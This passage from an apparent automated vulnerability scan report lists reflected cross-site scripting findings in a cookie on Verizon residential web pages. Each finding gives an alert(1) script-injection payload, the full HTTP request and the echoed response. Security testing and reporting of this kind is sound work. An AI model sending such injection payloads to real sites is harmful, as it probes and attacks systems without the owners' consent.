Cookie: Source=CHSI; vzapps=STATE=TXc1b7b<script>alert(1)</script>28eee026df0; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 63717
Expires: Sat, 20 Nov 2010 00:12:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:12:26 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXc1b7b<script>alert(1)</script>28eee026df0; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | Internet | Wi-Fi
</title><meta name="keywords" content="verizon internet services, verizon internet products, verizon wi-fi, ISP, internet
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXC1B7B<SCRIPT>ALERT(1)</SCRIPT>28EEE026DF0 </DIV>
...[SNIP]...

3.240. http://www22.verizon.com/Residential/WiFi/ [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/WiFi/

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 63a3c'><script>alert(1)</script>03a48b9a52e was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/WiFi/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX63a3c'><script>alert(1)</script>03a48b9a52e; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 63721
Expires: Sat, 20 Nov 2010 00:12:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:12:11 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX63a3c'><script>alert(1)</script>03a48b9a52e; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | Internet | Wi-Fi
</title><meta name="keywords" content="verizon internet services, verizon internet products, verizon wi-fi, ISP, internet
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX63A3C'><SCRIPT>ALERT(1)</SCRIPT>03A48B9A52E ' />
...[SNIP]...

3.241. http://www22.verizon.com/Residential/WiFi/HowToGetIt [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/WiFi/HowToGetIt

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 5782f<script>alert(1)</script>042ef7a5b1d was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/WiFi/HowToGetIt HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX5782f<script>alert(1)</script>042ef7a5b1d; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 65807
Expires: Sat, 20 Nov 2010 00:11:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:11:42 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX5782f<script>alert(1)</script>042ef7a5b1d; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | Internet | Wi-Fi: How to Get It
</title><meta name="keywords" content="verizon internet services, verizon internet products, verizon wi-fi
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX5782F<SCRIPT>ALERT(1)</SCRIPT>042EF7A5B1D </DIV>
...[SNIP]...

3.242. http://www22.verizon.com/Residential/WiFi/HowToGetIt [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/WiFi/HowToGetIt

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9067c'><script>alert(1)</script>8e4bfe5a6f4 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/WiFi/HowToGetIt HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX9067c'><script>alert(1)</script>8e4bfe5a6f4; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 65811
Expires: Sat, 20 Nov 2010 00:11:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:11:37 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX9067c'><script>alert(1)</script>8e4bfe5a6f4; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | Internet | Wi-Fi: How to Get It
</title><meta name="keywords" content="verizon internet services, verizon internet products, verizon wi-fi
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX9067C'><SCRIPT>ALERT(1)</SCRIPT>8E4BFE5A6F4 ' />
...[SNIP]...

3.243. http://www22.verizon.com/Residential/aboutFiOS/Overview.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/aboutFiOS/Overview.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b381b'><script>alert(1)</script>ce796c23fc was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutFiOS/Overview.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXb381b'><script>alert(1)</script>ce796c23fc; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 70907
Expires: Sat, 20 Nov 2010 00:11:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:11:50 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:50 GMT; path=/
Set-Cookie: ContextInfo_State=TXb381b'><script>alert(1)</script>ce796c23fc; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:50 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:50 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:50 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXB381B'><SCRIPT>ALERT(1)</SCRIPT>CE796C23FC ' />
...[SNIP]...

3.244. http://www22.verizon.com/Residential/aboutFiOS/Overview.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/aboutFiOS/Overview.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload cb6db<script>alert(1)</script>2abfc7b8635 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutFiOS/Overview.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXcb6db<script>alert(1)</script>2abfc7b8635; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 69363
Expires: Sat, 20 Nov 2010 00:11:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:11:54 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:54 GMT; path=/
Set-Cookie: ContextInfo_State=TXcb6db<script>alert(1)</script>2abfc7b8635; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:54 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:54 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:54 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXCB6DB<SCRIPT>ALERT(1)</SCRIPT>2ABFC7B8635 </DIV>
...[SNIP]...

3.245. http://www22.verizon.com/Residential/aboutFiOS/labs/labs.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/aboutFiOS/labs/labs.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 3e936<script>alert(1)</script>c5abaf729ed was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutFiOS/labs/labs.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX3e936<script>alert(1)</script>c5abaf729ed; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 78163
Expires: Sat, 20 Nov 2010 00:11:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:11:33 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:33 GMT; path=/
Set-Cookie: ContextInfo_State=TX3e936<script>alert(1)</script>c5abaf729ed; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:33 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:33 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:33 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX3E936<SCRIPT>ALERT(1)</SCRIPT>C5ABAF729ED </DIV>
...[SNIP]...

3.246. http://www22.verizon.com/Residential/aboutFiOS/labs/labs.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/aboutFiOS/labs/labs.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ab065'><script>alert(1)</script>e9047e9551f was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutFiOS/labs/labs.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXab065'><script>alert(1)</script>e9047e9551f; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 78167
Expires: Sat, 20 Nov 2010 00:11:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:11:29 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:29 GMT; path=/
Set-Cookie: ContextInfo_State=TXab065'><script>alert(1)</script>e9047e9551f; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:29 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:29 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:29 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXAB065'><SCRIPT>ALERT(1)</SCRIPT>E9047E9551F ' />
...[SNIP]...

3.247. http://www22.verizon.com/Residential/aboutFiOS/reviews/reviews.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/aboutFiOS/reviews/reviews.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload dd3b4<script>alert(1)</script>757b9633f3c was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutFiOS/reviews/reviews.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXdd3b4<script>alert(1)</script>757b9633f3c; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 73425
Expires: Sat, 20 Nov 2010 00:13:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:13:03 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:13:03 GMT; path=/
Set-Cookie: ContextInfo_State=TXdd3b4<script>alert(1)</script>757b9633f3c; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:13:03 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:13:03 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:13:03 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXDD3B4<SCRIPT>ALERT(1)</SCRIPT>757B9633F3C </DIV>
...[SNIP]...

3.248. http://www22.verizon.com/Residential/aboutFiOS/reviews/reviews.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/aboutFiOS/reviews/reviews.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 26326'><script>alert(1)</script>0d04466e0c9 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutFiOS/reviews/reviews.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX26326'><script>alert(1)</script>0d04466e0c9; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 73429
Expires: Sat, 20 Nov 2010 00:12:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:12:51 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:51 GMT; path=/
Set-Cookie: ContextInfo_State=TX26326'><script>alert(1)</script>0d04466e0c9; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:51 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:51 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:51 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX26326'><SCRIPT>ALERT(1)</SCRIPT>0D04466E0C9 ' />
...[SNIP]...

3.249. http://www22.verizon.com/Residential/aboutFiOS/widgets/widgets.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/aboutFiOS/widgets/widgets.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a49de'><script>alert(1)</script>ec31fe281d2 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutFiOS/widgets/widgets.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXa49de'><script>alert(1)</script>ec31fe281d2; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 73636
Expires: Sat, 20 Nov 2010 00:11:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:11:20 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:20 GMT; path=/
Set-Cookie: ContextInfo_State=TXa49de'><script>alert(1)</script>ec31fe281d2; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:20 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:20 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:20 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXA49DE'><SCRIPT>ALERT(1)</SCRIPT>EC31FE281D2 ' />
...[SNIP]...

3.250. http://www22.verizon.com/Residential/aboutFiOS/widgets/widgets.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/aboutFiOS/widgets/widgets.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 202c8<script>alert(1)</script>a033bcd02b5 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

